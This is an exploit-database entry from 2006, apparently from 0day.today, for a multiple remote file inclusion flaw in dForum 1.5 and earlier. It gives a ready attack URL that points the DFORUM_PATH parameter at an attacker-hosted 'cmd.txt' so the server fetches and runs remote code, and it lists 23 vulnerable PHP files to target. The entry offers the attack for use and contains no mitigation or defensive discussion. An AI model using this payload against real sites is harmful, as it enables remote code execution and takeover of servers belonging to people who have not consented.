dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusions

2006-04-21T00:00:00
ID 1337DAY-ID-375
Type zdt
Reporter nukedx
Modified 2006-04-21T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===========================================================
dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusions
===========================================================





dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusion Vulnerabilities.
Method found by nukedx,
This exploit works on dForum <= 1.5
http://[victim]/[dForumPath]/[filename]?DFORUM_PATH=http://yourhost.com/cmd.txt?
Files ->
about.php
admin.php
anmelden.php
closethread.php
config.php
delpost.php
delthread.php
dfcode.php
download.php
editanoc.php
forum.php
login.php
makethread.php
menu.php
newthread.php
openthread.php
overview.php
post.php
suchen.php
user.php
userconfig.php
userinfo.php
verwalten.php


#  0day.today [2018-03-05]  #